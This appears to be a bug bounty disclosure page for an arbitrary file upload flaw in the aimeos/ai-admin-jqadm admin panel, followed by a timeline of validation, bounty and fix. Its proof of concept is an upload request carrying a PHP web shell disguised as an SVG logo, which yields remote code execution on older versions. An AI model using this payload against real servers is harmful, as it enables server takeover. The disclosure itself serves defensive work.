Arbitrary file upload in aimeos/ai-admin-jqadm

Valid

Reported on

Aug 14th 2023


Description

Due to lack of file extension validation, privileged user (administrator) can upload arbitrary files with "update logo" and "update icon" features. The application uses the extension provided in the filename parameter.

Proof of Concept

POST /admin/default/jqadm/save/settings?locale=en HTTP/1.1
...
------WebKitFormBoundaryAG74QWXOFzNc5cbH
Content-Disposition: form-data; name="media[logo]"; filename="test.php"
Content-Type: image/svg+xml

<svg>
  /* <![CDATA[ */
    <?php system($_GET['c']);
?>
 /* ]]> */
</svg>
...

A request crafted this way will lead to "logo.php" file being created.

Impact

This leads to Remote Code Execution in versions using vulnerable "enshrined/svg-sanitize" library for sanitization (deployments that didn't upgrade since 2022.10.13). In newer versions there isn't any significant impact. But the arbitrary file upload part is still there in versions prior to 2023.07.3 that could be used as part of more complex exploit chain if additional vulnerabilities are discovered.

We are processing your report and will contact the aimeos/ai-admin-jqadm team within 24 hours. 6 months ago
We have contacted a member of the aimeos/ai-admin-jqadm team and are waiting to hear back 6 months ago
Aimeos validated this vulnerability 6 months ago
mr3jane has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Aimeos marked this as fixed in 2022.10.13 with commit bfd722 6 months ago
Aimeos has been awarded the fix bounty
This vulnerability has now been published 6 months ago
Standard.php#L317 has been validated
Standard.php#L359 has been validated
m4noo
6 months ago

how to build

Stan
6 months ago

Researcher


Any chance of registering a CVE for this? We've discussed it in the original report, but maybe you've changed your mind

to join this conversation